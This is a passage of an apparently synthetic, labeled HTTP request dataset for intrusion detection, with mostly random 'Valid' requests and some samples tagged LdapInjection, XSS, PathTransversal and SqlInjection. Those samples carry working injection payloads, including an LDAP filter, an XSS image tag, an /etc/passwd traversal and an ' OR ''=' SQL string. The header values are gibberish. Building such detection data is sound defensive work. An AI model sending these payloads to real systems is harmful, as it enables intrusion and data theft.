grm2i9ei5n=iEG&ert2niseoemd=dlfic&tXdrserieSl=2uiw0F0otieouik&N20YIci-D6=oancYy&XV5B4f50f2=557&res7xr9tse=yra(a&einTdyrIcings=oB6uw

End - Id: 6467
Start - Id: 14071
class: Valid
GET /wqTcqHEemt.html?n5rciqdDRnzso=etqsaht%2Fs%2F9+r%7Etnse&uridesyofA4av=07&Ptmspq=5&kaBm4systeml1f.=Ra HTTP/1.0
Host: 212.88.191.42
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: iso-8859-7, hz-gb-2312;q=0.5, windows-1250
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: max-stale
Client-ip: 109.152.198.220
Cookie: 4Ux4eetsz1Ie=ehbetweenaye7rtTOlro;Xign33Vj=259218774
Cookie2: $Version="9"
Date: Wed, 12 Oct 05 22:48:10 UTC
ETag: W/"Jsk4MZ2PFqYZra6ysJ"
Expect: xIz0hoi
From: nuea@cnmet.it
If-Modified-Since: Sun, 24 Sep 06 09:39:28 UTC
If-Unmodified-Since: Thu, 14 Feb 08 24:13:54 GMT
If-Match: *
If-None-Match: "5jRlYuTiO@cSdqLM.2"
If-Range: *
Max-Forwards: 320
MIME-Version: 0.9
Pragma: tu3ipln='i99r'
Proxy-Authorization: ttEwuI ekAiIsm=bAtlrrg
Authorization: 43uoY 1dnil2=iaadsk
Range: -8703,81-
Referer: /n8aythb/magaveag/niks.jpeg
TE: chunked
Trailer: TE
User-Agent: mimtK0Mc http://www.rrmlat.uk
UA-CPU: Sparc
UA-Disp: 091,777,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 7101x892
Via: HTTP/0.6 www.ccipn.tiff, 6.2 www.imbheinn.jpeg
Transfer-Encoding: identity
Upgrade: f5esqa/4.6, oCCert/1.3, oteo/4.6, Tlf/5.9, inth/5.5
Warning: 113 www.8ee8ks.html "olotey" 
X-Forwarded-For: 129.228.114.117
X-Serial-Number: 7508201
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14071
Start - Id: 37727
class: LdapInjection
GET /a4BwJYmIfjM-aakwx.T/swDFxsZFWnw.asmx?el=29662&eAohEInc9aauT=%3B%292+&tDarayz=81&n8enehdd=6%5Ds&4eh=%25lnia+ynnL%3Aenoy&4qprzeehB=%29+++%28+%7C+++%28displayName%3Dhad*%29++++%28name++++%3D+had*++%29%28+mail%3Dhad*+%29&dtewgrowt=401896 HTTP/1.1
Host: 39.164.122.41
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: *
Accept-Encoding: *
Accept-Language: 6ni4-oEa, I-5t5gu6lr, re-2;q=0.0, eoecaxEy-uwearr;q=0.7, anwlrcm-ef
Cache-Control: no-cache
Client-ip: 44.160.29.148
Cookie: cersofamt=nxUB;Uwindow.openMy=4655;eijbohzciupeg='-8zr:Ro~t;6kpliemRnnei=ns%udsv4hk
Date: Mon, 30 Jan 06 03:08:26 UTC
ETag: "Ulrvtu2pQE785CphD"
Expect: fniL
From: Iiydrs@AboeNOsxe.biz
If-Match: "Un1nhA4uVyDIbZ95fouF"
If-None-Match: "W.YdmZhUY2fMSAgVb"
Authorization: qUnEri oed2rtue=eUi1
Referer: /ihtiq.jsp
Trailer: Date
User-Agent: Mozilla/9.5 (Windows; U; Win98 0.9; iv-ej; rv:1.4.7) Gecko/89160116
UA-CPU: x86
Via: ape/0.9 209.174.31.101
Transfer-Encoding: tgaa; qsrsyk=EFaose
Upgrade: Ap4Ev/4.4, eut/9.8
Warning: 812 www.dOsiefc.htm "lm4se" 
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37727
Start - Id: 29608
class: Valid
GET /sL7srpTM/wC0RT/aXQEDsF_-i3G-v/tbpCZO8uY/ygglle/ohlvdrO.mspx? HTTP/1.1
Host: 211.38.65.2
Connection: keep-alive
Accept: application/*, application/postscript, audio/*;q=0.1
Accept-Charset: *;q=0.9
Accept-Encoding: identity;q=0.7, identity;q=0.0
Accept-Language: tfE-e8sn;q=0.0
Cache-Control: only-if-cached
Client-ip: 140.155.217.246
Cookie: phntehioec=63126227;qmitiaeebjtey=| ft5esock_streamnt 
Cookie2: $Version="8"
Date: Fri, 18 Mar 05 01:27:09 GMT
ETag: W/"9hHlpMB_S.slcfp4W"
Expect: 100-continue
From: hk595Mi@tgQyreiAr.cz
If-Modified-Since: Sat, 12 Jan 08 11:16:50 CET
If-Unmodified-Since: Sat, 30 Jul 05 19:04:15 UTC
If-Match: "-98-asdq1ZGe3SV_OoA"
If-None-Match: "PpYXrdpeBoYU8BE"
If-Range: Sat, 27 Nov 04 12:27:37 UTC
Max-Forwards: 93
MIME-Version: 1.3
Pragma: ns='2a6vo'
Proxy-Authorization: Basic ZWVzaHRnb2U6T2hvY2dKcw==
Authorization: e6soxu e9oa=tliyRiei
Range: -074,-900485
Referer: /enc8/dLra4tLv/adpdy/2aoCorel/i1l6f.jpeg
TE: trailers,trailers
Trailer: Date
User-Agent: Mozilla/1.0 (X11; U; Linux i386 6.3; to-me; rv:9.4.9) Gecko/60637313
UA-CPU: StrongARM
UA-Disp: 146,4817,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 5641x077
Via: rirsdh/4.7 www.feaQ5l.js
Transfer-Encoding: compress
Upgrade: EEup5/0.6, rehtet/6.6, trdh/7.5, ooo/2.6, rwA1y/4.2
Warning: 552 www.eghciu.html "MEdi" "Thu, 09 Jun 05 12:22:53 GMT"
X-Forwarded-For: 103.158.61.201
X-Serial-Number: 41855
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29608
Start - Id: 23931
class: Valid
GET /K%uG8DT3select5EN/XxMPpsaccess_logP/ctK392n5Iu-ww/9V/0tope9.asp?ealSs8s=techothft6ly&sedj7e1oeehmen=window.openy3zroperlhMhdeubeeowhere&doociptwh0i=%7Eh&UdxLR4j=pijRv8IgcY7&qt4q=i5parm&ienelmnoathniMn=3370506&tetliwpiZedv=6ie8eae8ea&nstTaisNs1Yuten=aihv&4rerskncdirFtEe=15092555&iwoorzicuoa1N=9aselecte0Febuns&dv=bh&baaFEpinoeOo=d6iten15ts&rocas=78041774&9mVsv5-blsG=2iInarnrTfaxs&ncm=0oiuceti HTTP/1.0
Host: 83.139.92.58
Connection: 5otieac1
Accept: */*;q=0.4
Accept-Charset: koi8;q=0.7, x-mac-ce, euc-kr;q=0.5, x-mac-chinesesimp;q=0.6, isiri-3342
Accept-Encoding: compress
Accept-Language: s-ywentec6;q=0.5, jrwie-rndma, uuramolc-nir;q=0.0, l-i;q=0.9
Cache-Control: eaed='iEs2nta'
Client-ip: 238.183.7.187
Cookie: ns=zetrH$Ntbgsoundu\pc%
Cookie2: $Version="99"
Date: Mon, 16 Feb 04 14:24:07 GMT
ETag: W/"o1k84rC7tsnY8nbdP0O1"
Expect: 100-continue
From: grcnsLr@2tnritg.be
If-Modified-Since: Thu, 02 Feb 06 24:02:13 UTC
If-Unmodified-Since: Sun, 27 Jan 08 21:11:33 UTC
If-Match: *
If-None-Match: *
If-Range: "VtxYdqm5bjpoZBT6Gty"
Max-Forwards: 4
MIME-Version: 2.7
Pragma: pa='shcllod'
Proxy-Authorization: ers8 j6eroeoe=halr4
Authorization: NTLM ZXlwNWFuYTVvbGNFZnRldHV5YW9nZW5vQXd5THN0bGVuZGVmcG9waHdlb2V0aA==
Range: 074-7647,9-,-3
Referer: /9ulgnlm/HiGe.sh
TE: chunked;q=0.0,gzip;q=0.6,chunked
Trailer: Accept-Charset
User-Agent: tl1cniu/4.8
UA-CPU: StrongARM
UA-Disp: 722,7012,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 916x209
Via: 8.8 www.Trlect.css, 6.0 www.obeauamt.jpg, ocab01/5.9 155.224.137.81
Transfer-Encoding: compress
Upgrade: tehni/0.9, Cea4fl/2.0, ztoh/4.3, pe6/2.9, ad9/9.3
Warning: 790 171.116.173.213 "hopsown6nqcIceI3A" "Sat, 01 Oct 05 02:13:23 CET"
X-Forwarded-For: 220.20.217.236
X-Serial-Number: 5482799562
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23931
Start - Id: 1555
class: Valid
GET /c1a0z@B..aAoOxWF/eoumvf/efrdp/imatPIHi7J/lE4teaa/r56pfv03IBv3MmHkv@s/Teroeh0owayad/fhe4EE6cetcteT8abdD7/Hq0Gei/81phpq4Gy.tiff?e6O=ekga2el HTTP/1.0
Host: 3.98.227.239
Connection: close
Accept: image/png, audio/x-wav;q=0.5
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: max-age=137
Client-ip: 139.146.235.78
Cookie: tyseb=1336
Cookie2: $Version="1"
Date: Wed, 03 Feb 10 17:39:26 UTC
ETag: "vFdKUf@MPEr6N6U"
Expect: meYira=tis4mexm;eieUm
From: 3utdaot@tekio.net
If-Modified-Since: Tue, 10 Jan 06 18:44:00 CET
If-Unmodified-Since: Tue, 11 Oct 05 04:11:33 CET
If-Match: *
If-None-Match: *
If-Range: "YVe3dCFtuziCxFr"
Max-Forwards: 913
MIME-Version: 9.8
Pragma: no-cache
Proxy-Authorization: Basic OGRhc3J0Y3Q6UmVlVHk=
Authorization: yoT7 bseO=fana
Range: -6,-03,-014
Referer: http://www.ak9ineAS.fr/jLefkgta/p4tease.pdf
TE: trailers
Trailer: Accept-Charset
User-Agent: Mozilla/1.4 (compatible; nfgdwadO; Open BSD i386; Medn)
UA-CPU: StrongARM
UA-Disp: 048,2159,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 7934x8697
Via: 4.7 104.31.67.96, 0.5 www.ieTods.jpeg
Transfer-Encoding: ftnba
Upgrade: ameA/9.9, rzoIer/1.8, llO2/3.9, Oyt/1.5
Warning: 856 30.67.224.109:7 "ngikdsay3mi" "Sat, 09 Jun 07 23:13:19 GMT"
X-Forwarded-For: 36.197.187.144
X-Serial-Number: 2858071636366715430
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1555
Start - Id: 28189
class: Valid
GET /Startkate7darheor/txNmcusmX.gif?3lfmoE4=33338&iraeaochrjepn0g=ewsa&mochaNFIH2=tchisock_streame%5Dth%3D7x%26dso5+3w&n9a5a7rneaa=ohF&dm07=te+sc&hlusrJeruo=54358994&bndq=ihavingmochai7f%3Dsg%2F%26%28&oseehFu=%7Erenplr&atra=seopt+Cnni1%3B&0ojEnmsi=4873634&3iTi4tTeit=oSixDct&miItetlc0t=aU0&in15ese2pde6A=22 HTTP/1.0
Host: www.wpnyaslt.uk
Connection: close
Accept: audio/x-wav, audio/basic, text/html;q=0.6
Accept-Charset: *
Accept-Encoding: deflate
Accept-Language: s8-htlm, ad0tdi-0s, ouia-hel94;q=0.5, sgog-looSai;q=0.7, 1oes-ito
Cache-Control: cogttx='hepTgd'
Client-ip: 140.141.64.90
Cookie: lonqoeIae6njh=628194;ehDrieemR=2b@TvP@wup;smtnde7ECose=07;GidstoSvyn=70217795;mlhiEfswsixxn=26409520;nullcKfvscriptvxSrm1xterm=738097
Cookie2: $Version="808"
Date: Tue, 06 Feb 07 05:55:38 UTC
ETag: "eutI8MAMAXW4D@Xam"
Expect: SeeDtoat
From: haidri@m6zcet8gA.ch
If-Modified-Since: Sun, 16 Mar 08 11:01:15 CET
If-Unmodified-Since: Thu, 22 Apr 10 08:50:12 CET
If-Match: *
If-None-Match: "XnJKBSXRRoTspv4Z5BgM"
If-Range: Tue, 22 Apr 08 13:00:34 GMT
Max-Forwards: 54
MIME-Version: 7.9
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: NTLM emllRlRzcmVjMGJjMzNhZE9xaVRuMzdhem8wdXlodmhkbmVvZW9z
Range: -569,-376,5-
Referer: http://www.reamoFov.it/yoti.pdf
TE: deflate;q=0.6
Trailer: If-None-Match
User-Agent: n8WuvTwne (gDlLHv; eJiXpi4BOo; a9sjpys3A; fhBrba.NI)
UA-CPU: MIPS
UA-Disp: 0207,3028,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 709x9320
Via: 9.3 74.218.204.210, 6.5 www.cf5nre6.jpg, 4.3 www.26aa.jpg:5
Transfer-Encoding: gzip
Upgrade: sse7/8.3, nhtR8u/1.0, lwewrt/4.6, hgvtE/7.5
Warning: 941 204.125.32.112 "Rsze" 
X-Forwarded-For: 242.176.161.203
X-Serial-Number: 3105222216298089545
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28189
Start - Id: 46870
class: XSS
PUT /Olc0jThems7ihe2a.gif? HTTP/1.0
Content-Length: 184
Content-Language: stygsni,Dc
Content-Encoding: deflate
Content-Location: /ioohpohr.zip
Content-MD5: cnNmc0ViNXQ1MWFLaXJTdQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 30 Apr 09 06:58:40 GMT
Last-Modified: Wed, 20 Jul 05 02:58:45 UTC
Host: 183.4.251.11:9187
Connection: close
Accept: image/png;q=0.1, video/mpeg;q=0.2
Accept-Charset: iso-8859-8, macintosh, windows-1255;q=0.2, x-mac-icelandic, gb2312;q=0.1
Accept-Encoding: *;q=0.2
Accept-Language: *;q=0.3
Cache-Control: te=No
Client-ip: 74.208.49.31
Cookie: nmaiaol1tn=7365;seen=t;kue9i=nSfsCqgjG
Cookie2: $Version="36"
Date: Fri, 02 May 08 05:17:55 UTC
ETag: "ynNtDqxUiypefBzDU"
Expect: ow31=ifEwE
From: xorersew@0i1thu.fr
If-Modified-Since: Wed, 28 Oct 09 17:39:25 CET
If-Unmodified-Since: Fri, 08 Apr 05 02:04:25 UTC
If-Match: *
If-None-Match: "Z_2PyHiv3JhHR73_N"
If-Range: Mon, 22 Sep 08 22:34:51 GMT
Max-Forwards: 128
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: Basic amFib2lrQWY6bWVxOHNyZA==
Authorization: Digest uri=/ioptabs/frdsoAN/sEhe7/Ittfram8.mpg
Range: 6262-,10870-70169
Referer: http://www.ngai.ch/idok4nr/csoicct/u6ennsho/NC2a/Trsjapqb.txt
TE: deflate;q=0.0,trailers
Trailer: Pragma
User-Agent: Mozilla/1.7 (Machintosh; U; Mac OS X 5.0; ti-aV; rv:7.8.9) Gecko/72700326
UA-CPU: x86
UA-Disp: 457,6373,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 2245x173
Via: FTP/3.0 159.8.188.28, 5.7 185.242.215.249
Transfer-Encoding: gzip
Upgrade: Btglc/3.9, rreo/8.4
Warning: 910 www.aqeeeiu.htm "tjdShea8TwiOuAu" "Mon, 12 May 08 02:53:43 CET"
X-Forwarded-For: 213.211.107.254
X-Serial-Number: 93268691782079750245
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

S5OD=36&dtnlsaetrx3=2709&iytnnuovns3=<img src  =    "     mocha:[alert('sereb3yIne');]     "  >&ing4location7kVb=wrrfs&Cntg=y?n0diAddvehyt&douLhto=iPX5FPbyo

End - Id: 46870
Start - Id: 20326
class: Valid
GET /33bmm9KL/ymc@/e5dgC82SBZZUzqf-@/epNE/cgZnByJM7c/woer/escript1I/nneseennimc.html?2llreEyne=tL%2FX%27d%3Ctmpl%3DaTy%7Ebellink&ltat4jlloA=81310294&seReEAtgde=03 HTTP/1.1
Host: 54.69.135.69
Connection: close
Accept: */*
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: saoj3-ailewhfb;q=0.9
Cache-Control: max-age=9542
Client-ip: 242.195.252.118
Cookie: hmfeethnmb=g(;uthty6=59;wefH62icczoaeX=6;cs=91;n3asi=Obe)nn]mamT4 8emqxmlt
Cookie2: $Version="51"
Date: Wed, 11 Jun 08 17:00:05 GMT
ETag: "CXJ-iSY5TW2-rp_6B2"
Expect: 100-continue
From: 9qbyo33@htvnn.org
If-Modified-Since: Mon, 16 Jan 06 23:07:53 UTC
If-Unmodified-Since: Thu, 18 Mar 04 22:15:14 UTC
If-Match: "07N8MZPTsft349AEye"
If-None-Match: *
If-Range: "5XYW4zB_1b73bssA"
Max-Forwards: 46
MIME-Version: 6.6
Pragma: bTt2senr=r9daapwA
Proxy-Authorization: Basic ZTI4bzplZXN0
Authorization: NTLM Y29lb3RhdGhrbDVUUnJCYW9pZXdlYXQ5aWlieHRCdWhlc3RxZWN0YnAyaDNtYw==
Range: 39-4,79168-,7750-8
Referer: http://www.tZjVR.ch/atrrki.cgi
TE: deflate,gzip
Trailer: Transfer-Encoding
User-Agent: Mozilla/5.1 (X11; U; Linux i386 3.7; at-eL; rv:6.5.3) Gecko/11760074
UA-CPU: PowerPC
UA-Disp: 451,188,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 5764x832
Via: FTP/1.6 118.210.178.145
Transfer-Encoding: gzip
Upgrade: ha6gn/0.9, tetpr/6.4, exend/4.5, i4dR/0.3
Warning: 346 www.36mitaoo.jpeg "eaUhh" "Mon, 31 May 04 13:05:01 UTC"
X-Forwarded-For: 115.210.125.144
X-Serial-Number: 31655663279730
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20326
Start - Id: 20641
class: Valid
GET /metastdinhaving/doxBrVo9VR8XUadminA/nk..shtml?edxyuahq4e=hada8honfh HTTP/1.1
Host: 33.80.95.9
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: windows-1257;q=0.8, windows-1255, iso-8859-5;q=0.4, x-mac-japanese
Accept-Encoding: *;q=0.8
Accept-Language: hnmtl-nwa9e, f-aeoL;q=0.3, nn-iloo4sdl, nsu-des8u, Wctnbn-5Chtlw7;q=0.3
Cache-Control: l5acAt='jrblu'
Client-ip: 176.169.150.86
Cookie: uleeoi= 6rsl ;otcneh=;
Cookie2: $Version="664"
Date: Tue, 01 Apr 08 21:20:55 UTC
ETag: "GSLvwHYvvQlrtGMcD"
Expect: zhcapaa=4SySOen;myedr=9rlpRete
From: hims9lO@pelsineh9.it
If-Modified-Since: Thu, 05 Mar 09 06:30:55 CET
If-Unmodified-Since: Wed, 05 Nov 08 20:34:13 CET
If-Match: *
If-None-Match: *
If-Range: Tue, 01 Jul 08 20:46:09 GMT
Max-Forwards: 08
MIME-Version: 1.6
Pragma: tXak=q
Proxy-Authorization: sRah gaho=eeosctBp
Authorization: Digest realm
Range: 833047-0828
Referer: http://www.ngoqSE.uk/d4te/eidCong/osrer8La.pl
TE: deflate;q=0.6
Trailer: Host
User-Agent: pMaHA_pSJ http://www.elibhng.org
UA-CPU: 68000
UA-Disp: 568,9579,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 323x7218
Via: FTP/8.7 16.146.18.21, HTTP/6.9 www.atasi.html
Transfer-Encoding: compress
Upgrade: hedyo/0.6
Warning: 686 www.rTrrd6ee.jpg "theolwi8aoeo" 
X-Forwarded-For: 248.76.50.134
X-Serial-Number: 206617484
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20641
Start - Id: 28278
class: Valid
GET /icPQwD./tZsXF/mXsrcpkncfopt2iframeRV/d7YZul/ewmotjkeq2engaOe/rkgW1Xx8R9w/ny.jpeg?autoexecevalNQowp-2HCT=693735&@QJgihttpsNvs5=rahhrcpsd&wsnfhcgiice=%25lotnadeonan&H4saxmrfC7@=evattafstStoitp&hmrvsraFt=eSX&cf=1&_rWf5Ou-n=5&sdtolOdn=Rn%3Esam&DkS.CSKwHEE=8405407&enat=tcWtqg&iianwpt=leuoaanme&sgrilic=2649109744 HTTP/1.1
Host: 93.26.176.30:78677
Connection: close
Accept: audio/basic;q=0.1, video/*
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: ca='lCxet'
Client-ip: 79.12.235.104
Cookie: QM1mtVAjOR=;emar
Cookie2: $Version="767"
Date: Thu, 05 Jan 06 15:07:30 GMT
ETag: "2fXL_y5bCBBhA@GLyTH"
Expect: aenHj=aCRes;7Nlzeno
From: Elo5h@esedtsi8.net
If-Modified-Since: Sun, 30 Sep 07 13:18:07 CET
If-Unmodified-Since: Fri, 09 Apr 04 09:31:22 UTC
If-Match: "RJr-TwwOQO-qob6"
If-None-Match: "Mizh0QUgIkvUxDy4"
If-Range: Mon, 16 Jul 07 12:52:24 UTC
Max-Forwards: 34
MIME-Version: 4.5
Pragma: s='t'
Proxy-Authorization: olaif WunoaCa=aerw
Authorization: Basic b2Fodm9lOnN3cGw=
Range: 3-15771,8-
Referer: http://pntpd.net/r2ileamr/r9ftn4e.conf
TE: trailers,trailers,gzip;q=0.9
Trailer: Cache-Control
User-Agent: sh3enT2xdz http://www.sowoejty.uk
UA-CPU: Sparc
UA-Disp: 5435,696,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 891x280
Via: FTP/6.9 www.joctTt.png:8247, Aetu2/5.1 141.157.52.92
Transfer-Encoding: ealne; entAeIt=r3xetse
Upgrade: iaRtso/6.7, aakyo/7.1, oash/9.5, mwdp/3.3
Warning: 207 www.iRadateo.png "Hkr6Ecnpnearvdrttm" "Thu, 13 Aug 09 17:46:46 CET"
X-Forwarded-For: 209.67.183.110
X-Serial-Number: 59455788287965152
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 28278
Start - Id: 46091
class: PathTransversal
PUT /0dkCVxtermC/1o8n3Pp2Eu1Ex_jbxKp/xxrSISp-T/onnehllnts/e1RK4XroB6K/tVdvR/hx/mEs.asp? HTTP/1.1
Content-Length: 324
Content-Language: tSe,2mi
Content-Encoding: gzip
Content-Location: /senec/hiieiNti/tm6kkhoa.js
Content-MD5: aXRpcG9obEV0bHVENmF5dg==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 08 Feb 10 04:42:56 UTC
Last-Modified: Wed, 22 Aug 07 17:48:49 UTC
Host: www.nrrA.be
Connection: utfkcu
Accept: video/*, application/postscript;q=0.9
Accept-Charset: *
Accept-Encoding: 
Accept-Language: dri-metti, oo-a;q=0.0
Cache-Control: max-stale
Client-ip: 189.254.153.1
Cookie: Lm_KkQizAJP0=u.ahgmNBPetu;mHreWyrt=14112202;zn1eosm0rsdkA=tADqcC3C;eaSre=i0bsis$Fnmb(eyt;6anasstzg=aAo;lbtGnnpwmv=UG3yndehefeusesy
Cookie2: $Version="065"
Date: Fri, 10 Jun 05 05:51:20 GMT
ETag: W/"TbF8453pah_RFw4TC"
Expect: easElso=8jRolIq
If-Modified-Since: Sun, 02 May 04 14:06:45 UTC
If-Unmodified-Since: Thu, 23 Jul 09 21:35:35 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 28 Sep 08 23:14:17 CET
Max-Forwards: 58
MIME-Version: 4.9
Pragma: no-cache
Proxy-Authorization: NTLM bm9qb29xc2tyZXBudGVzdGNzeWVuOW1mYXlUbWFlZXJuZXNsaWVkNGJpYW5zY3Jz
Authorization: iet9 phlsibs=tbjfe
Referer: http://4behi.biz/slst9nq/svEhi/4orcnn4s/o9t8o.msf
TE: trailers,deflate;q=0.8
Trailer: Date
User-Agent: Mozilla/5.7 (compatible; MSIE 4.1; WinNT; sad5qjibif; hebh; ogeu)
UA-CPU: x86
UA-Disp: 0405,3924,32
UA-Color: color32
UA-Pixels: 1090x096
Via: 7.5 www.izaed5n.html:5178, 4.2 201.40.5.226
Transfer-Encoding: compress
Warning: 420 www.aarl.jpeg "rnaiov" "Tue, 29 Nov 05 09:15:49 CET"
X-Forwarded-For: 169.44.253.54
X-Serial-Number: 2944853437474808698
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

osg=oWI_32h&gnttCe5rehhalt=eu22hv5Hk&aoltnaekns4gels=e1e&systemqBkvSxATqpasswd=31854157&tenioswt=snullsxe2as&aELDE=Ea:)tn&5Z_1oZ@rVconnect=shvk&XqSCZ-78p3yy=tsed;ple &eoOeervIwd=\.\.\/\.\.\/etc\/passwd&leeg=ur1(t7hre&K@epwYIq=gVwC&shieneste=963391891&08x9likeeval=be0%naezhe2otda&sIoahdtesoty=1

End - Id: 46091
Start - Id: 13072
class: Valid
GET /tnlhwcoqiHtbande/nwwtsieiw2tqid9mel/cteainuiotoruufcidte/zonaut1oimlinirPi/mxSBJIlsmjS.cfm?tesiaonlljM=74237&ouhijaNibAtco=92838&l9cd5oh=w9lrQlOwdlb&diarS=2800&esier=0&joaabm0iwlo4rie=sMp&l5n2Bi=utr3as6esiqmeNtt&N2kGX=tWlmLE%40tZN&sarxief=sglpodeletee&lyrf=64075 HTTP/1.0
Host: 143.228.194.152
Connection: close
Accept: */*
Accept-Charset: x-mac-arabic;q=0.1, windows-1258;q=0.6, cp-950;q=0.9, x-mac-korean
Accept-Encoding: gzip;q=0.9, gzip, deflate;q=0.9
Accept-Language: *;q=0.7
Cache-Control: min-fresh=62268
Client-ip: 81.49.118.93
Cookie: SfcYOsrjXB.F=rtelnetf7document/8tore;E7fmmrcp=i$8pwglsyDi;O5sE=iwO627;0KAUYHlo=:mtmn/v<htxp2;tat=Nw3eepoe7w fifnt;noitfRmpoeuAg=91487
Cookie2: $Version="333"
Date: Tue, 30 Jan 07 14:30:30 GMT
ETag: "lgqCvTweL83alXodx"
Expect: u8tnes=no6T;oeiI5=dw7e
From: cnaeE@mn5a6.gov
If-Modified-Since: Sun, 01 Oct 06 09:01:55 UTC
If-Unmodified-Since: Wed, 17 Sep 08 03:23:27 CET
If-Match: "ms@xnUXAff@A_xfly2Ym"
If-None-Match: *
If-Range: Wed, 01 Mar 06 10:19:57 UTC
Max-Forwards: 4756
MIME-Version: 1.2
Pragma: l='reA'
Proxy-Authorization: Ycxr satemsyr=pveoeaeo
Authorization: engcre seiObce=fRdEzpu
Range: 606765-51
Referer: http://pmnsps0D.it/8ooRaw/meidaoH/iionpin/Mnaooe.mpg
TE: gzip,chunked;q=0.5
Trailer: Host
User-Agent: Mozilla/3.7 (Windows; U; Win 9x 2.9; 5d-at; rv:6.7.8) Gecko/32994156
UA-CPU: 68000
UA-Disp: 271,129,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 880x583
Via: FTP/4.3 www.naadlloy.tiff, HTTP/7.6 www.rleue.gif, 2.2 79.67.238.145
Transfer-Encoding: deflate
Upgrade: s5iqnh/8.3, kyo/5.0
Warning: 628 www.nttty.js "cnhetkwotorseofg3" "Sat, 23 Jun 07 05:37:50 GMT"
X-Forwarded-For: 129.45.112.20
X-Serial-Number: 837041373393858
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 13072
Start - Id: 18157
class: Valid
GET /midrdAglcoahane/swetaoBbcahento/n-gDHiFauKs@f/Atne6/ae3qotBdeHdmhntin/ximderxla/iu6psnweaqsC8/onltlBye8h7Dctoet9j/1th/tgd/NE_gttwMV/0IQJSHY@WX28.jpg?orskdst1ac4E=ltaw&tmiNodrm=oay&Gnrcasx=nzlJUVC1QkP&aogeaasio=04&ah2hN9eehh=1839&alaalteohatm=usrtftpsdu&sslneet=5534&on5sro9=a%3Dlor%5Dnmh&b-DW=e%5Dtsock_streamlenvkr&71seipneilTih=Sseiewldu2Tsr HTTP/1.0
Host: 147.221.196.173
Connection: close
Accept: application/*;q=0.3
Accept-Charset: *;q=0.6
Accept-Encoding: *
Accept-Language: tlvzdefY-8bQe, to-se, ioN2-78er;q=0.3, 3wAefcc-brnbre;q=0.9, esM1mrn-oretrv;q=0.5
Cache-Control: max-age=5
Client-ip: 187.103.207.94
Cookie: PD4MHxtermsock_streamx7b5=ietd;stuaRteesal=5lftpia;iRans2o=ot@;p9lohlaectptea=aas-ii)jenbhldrop>ettl%u;degto1v=sperFrmefA2tg
Cookie2: $Version="841"
Date: Thu, 22 Mar 07 12:08:18 GMT
ETag: "4OnTg4GXhOJaxReCc"
Expect: 100-continue
From: 96bse@Sia8e.it
If-Modified-Since: Thu, 24 Aug 06 20:52:59 UTC
If-Unmodified-Since: Tue, 27 Mar 07 13:26:03 CET
If-Match: "JY45ucdimF62D5gp56"
If-None-Match: "Kb4VrEktA5D2bJK"
If-Range: "u7GM7tU8iGoO0rVQ"
Max-Forwards: 67
MIME-Version: 0.4
Pragma: e5='Llrye'
Proxy-Authorization: Basic ZXJhaTJodGU6a3RTaQ==
Authorization: Digest opaque="etaowik"
Range: 875436-348852,-818
Referer: /nnd9/Ethal.dll
TE: deflate,gzip;q=0.6
Trailer: Proxy-Authorization
User-Agent: eaAptdel/8.1
UA-CPU: 68000
UA-Disp: 2033,9785,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 3922x0648
Via: 1.1 33.27.147.237
Transfer-Encoding: egeNt
Upgrade: receba/6.4, n0ete/3.0, 8dtoRs/5.6, voa/4.8
Warning: 963 216.51.91.254:266 "gatunof" "Thu, 18 May 06 14:03:37 CET"
X-Forwarded-For: 47.138.63.112
X-Serial-Number: 21129432693089718
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18157
Start - Id: 42300
class: SqlInjection
GET /nhX/el/_8UkcopyRKPunionbgsoundTwget/e4B5/VwyF-896J1yA-py/tlhsawaTfea.gif?rii9Imraug6=%27+OR++++%27%27%3D%27&f1nMwqR=21&eutyahasf=epvcw0UibrAY&ph=20059&hilR5kli8ntnm=586194516&tsdo5=86&etagstdhf=eeganlmiperlR&fXLopenpNX6-QS=NniAtnOw9mhocD&TemVnn0oeadh=91&ethksssene=4558 HTTP/1.1
Host: www.ihsuiitp.cz:1294
